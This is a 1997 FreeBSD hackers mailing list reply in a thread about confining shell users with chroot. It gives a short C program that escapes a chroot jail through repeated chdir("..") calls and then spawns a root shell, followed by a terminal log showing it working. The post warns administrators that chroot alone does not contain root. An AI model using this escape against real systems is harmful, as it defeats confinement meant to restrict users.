From owner-freebsd-hackers  Thu May 29 17:50:55 1997
Return-Path: <owner-hackers>
Received: (from root@localhost)
          by hub.freebsd.org (8.8.5/8.8.5) id RAA19077
          for hackers-outgoing; Thu, 29 May 1997 17:50:55 -0700 (PDT)
Received: from alpo.whistle.com (alpo.whistle.com [207.76.204.38])
          by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA19070
          for <hackers@FreeBSD.ORG>; Thu, 29 May 1997 17:50:50 -0700 (PDT)
Received: (from daemon@localhost)
	by alpo.whistle.com (8.8.5/8.8.5) id RAA02601;
	Thu, 29 May 1997 17:41:08 -0700 (PDT)
Received: from current1.whistle.com(207.76.205.22)
 via SMTP by alpo.whistle.com, id smtpd002599; Fri May 30 00:41:06 1997
Message-ID: <338E21F7.446B9B3D@whistle.com>
Date: Thu, 29 May 1997 17:40:23 -0700
From: Julian Elischer <julian@whistle.com>
Organization: Whistle Communications
X-Mailer: Mozilla 3.0Gold (X11; I; FreeBSD 2.2-CURRENT i386)
MIME-Version: 1.0
To: Warner Losh <imp@village.org>
CC: Terry Lambert <terry@lambert.org>, dec@phoenix.its.rpi.edu,
        peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@FreeBSD.ORG
Subject: Re: Correct way to chroot for shell account users?
References: <199705291456.HAA03526@phaeton.artisoft.com> <E0wX6vy-0002fp-00@rover.village.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-hackers@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Warner Losh wrote:
> 
In fact here is a program to give you a root shell out of the 
chroot environ..
I just tested it
it works

> Michael Smith posted the program to climb out of the jail here a few
> months ago.  This isn't theoretical, but it works.  It was something
> along the lines of the following.  You can find it in the archives.
> 
> 
     #include <unistd.h>

main(int        argc, char **argv) {
        mkdir("foo");
        chroot("foo");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chdir("..");
        chroot(".");
        execl("/bin/sh", "sh", NULL);
}


built1% cd /
built1% df .
Filesystem  1K-blocks     Used    Avail Capacity  Mounted on
/dev/sd0a       38991    24797    11075    69%    /
built1% sudo chroot /work/julian/2.2R2
# df .
Filesystem   1K-blocks     Used    Avail Capacity  Mounted on
/dev/sd1s1f    2033631  1741315   129626    93%    /work
# cd /tmp
# cat >xx.c
[type in file above]
# make xx   
cc -O  xx.c  -o xx
# exec ./xx
# df .
Filesystem  1K-blocks     Used    Avail Capacity  Mounted on
/dev/sd0a       38991    24797    11075    69%    /
# exit
built1%